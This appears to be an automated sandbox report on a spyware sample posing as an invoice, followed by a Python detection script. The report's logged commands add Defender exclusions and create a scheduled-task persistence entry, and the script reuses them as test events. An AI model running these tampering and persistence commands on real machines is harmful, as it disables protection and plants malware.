Source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, kSS2HMsB8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.cs | Security API names: _0020.SetAccessControl
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.cs | Security API names: _0020.AddAccessRule
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, Fe6Q71Wm6WhO9Yp10w.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, Fe6Q71Wm6WhO9Yp10w.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.cs | Security API names: _0020.SetAccessControl
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/15@2/2
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File created: C:\Users\user\AppData\Roaming\pUAQmWA.exe
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Mutant created: \Sessions\1\BaseNamedObjects\QcSyIPuvQYpIvjkb
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3165.tmp
Source: TT Invoice copy.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TT Invoice copy.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\TT Invoice copy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\TT Invoice copy.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: TT Invoice copy.exe | ReversingLabs: Detection: 47%
Source: TT Invoice copy.exe | Virustotal: Detection: 51%
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File read: C:\Users\user\Desktop\TT Invoice copy.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\pUAQmWA.exe C:\Users\user\AppData\Roaming\pUAQmWA.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Process created: C:\Users\user\AppData\Roaming\pUAQmWA.exe "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
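The process chain listed above is what a detection engineer would key on: two PowerShell launches that add Defender exclusions (one for the sample, one for the dropped copy in Roaming), two schtasks /Create calls whose task definition is an XML file in %TEMP%, and each executable re-launching its own image before the stealer payload runs. The Python below is an added example, not part of the Joe Sandbox report or of any vendor tooling. It runs those three checks over process-creation events constructed from the command lines listed above, plus two benign control events and one base64-encoded (-enc) variant that the report does not contain, added to show the decoder path. The event schema (parent_image, image, command_line), the finding names, the control events and the extra executable paths used in them are assumptions.

```python
"""Added example (not from the Joe Sandbox report): three process-creation
checks run over events constructed from the report's command lines.
The (parent_image, image, command_line) schema is an assumed, generic one."""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the creating process (assumed field)
    image: str          # full path of the created process (assumed field)
    command_line: str   # raw command line as logged (assumed field)


# Every abbreviation PowerShell accepts for -EncodedCommand (-e, -ec, -en, -enc, ...).
_ENC_FLAGS = {"-e", "-ec"} | {"-" + "encodedcommand"[:i] for i in range(2, 15)}
# A Defender exclusion being added or changed through the MpPreference cmdlets.
_MPPREF = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b")
# Value of a schtasks /XML argument, quoted or bare.
_SCHTASK_XML = re.compile(r'(?i)/XML\s+(?:"([^"]+)"|(\S+))')
# Task definitions that live in a user or system temp directory.
_TEMP_DIR = re.compile(r"(?i)\\(?:AppData\\Local\\Temp|Windows\\Temp)\\")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _command_views(cmd: str) -> list[str]:
    """The raw command line plus any -EncodedCommand payload decoded (base64 of UTF-16LE)."""
    views = [cmd]
    toks = cmd.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in _ENC_FLAGS:
            try:
                raw = base64.b64decode(toks[i + 1], validate=True)
                views.append(raw.decode("utf-16-le", errors="ignore"))
            except (binascii.Error, ValueError):
                continue
    return views


def detect(ev: ProcEvent) -> list[str]:
    """Names of the checks that fire for one event (the names are assumed labels)."""
    hits = []
    child = _basename(ev.image)
    if child in ("powershell.exe", "pwsh.exe"):
        if any(_MPPREF.search(v) for v in _command_views(ev.command_line)):
            hits.append("defender_exclusion_added")
    if child == "schtasks.exe" and re.search(r"(?i)/create\b", ev.command_line):
        m = _SCHTASK_XML.search(ev.command_line)
        xml_path = (m.group(1) or m.group(2)) if m else ""
        if _TEMP_DIR.search(xml_path):
            hits.append("schtask_from_temp_xml")
    if ev.parent_image.lower() == ev.image.lower():
        hits.append("self_spawn_hollowing_candidate")   # parent re-launching its own image
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """(index, hits) for every event that triggers at least one check."""
    out = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            out.append((i, hits))
    return out


def build_sample_events() -> list[ProcEvent]:
    """Constructed events: the report's chain (0-5), two benign controls (6-7), one encoded variant (8)."""
    sample = r"C:\Users\user\Desktop\TT Invoice copy.exe"
    dropped = r"C:\Users\user\AppData\Roaming\pUAQmWA.exe"
    ps = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    ps_cmd = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
    st = r"C:\Windows\SysWOW64\schtasks.exe"
    st_cmd = r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML'
    # Not in the report: the same cmdlet hidden behind -enc, built here to exercise the decoder.
    enc = base64.b64encode(r"Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming".encode("utf-16-le")).decode()
    return [
        ProcEvent(sample, ps, f'{ps_cmd} Add-MpPreference -ExclusionPath "{sample}"'),
        ProcEvent(sample, ps, f'{ps_cmd} Add-MpPreference -ExclusionPath "{dropped}"'),
        ProcEvent(sample, st, rf'{st_cmd} "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"'),
        ProcEvent(sample, sample, f'"{sample}"'),
        ProcEvent(dropped, st, rf'{st_cmd} "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"'),
        ProcEvent(dropped, dropped, f'"{dropped}"'),
        ProcEvent(r"C:\Windows\explorer.exe", ps, f"{ps_cmd} Get-MpPreference"),
        ProcEvent(r"C:\Windows\System32\cmd.exe", st, rf'{st_cmd} "C:\ProgramData\Backup\task.xml"'),
        ProcEvent(r"C:\Users\user\Desktop\other.exe", ps, f"{ps_cmd} -enc {enc}"),
    ]


if __name__ == "__main__":
    for idx, hits in scan(build_sample_events()):
        print(idx, hits)
```

Feed it Sysmon event 1 or Security 4688 records with command-line auditing enabled. The self-spawn check is the noisiest of the three: browsers, installers and some updaters legitimately launch their own image, so in production it needs an allowlist or an extra condition such as the image being unsigned or, as in this report, living under Desktop or AppData\Roaming. The exclusion check deliberately matches Set-MpPreference as well, since the same tampering can be done with either cmdlet.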
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: mscoree.dll
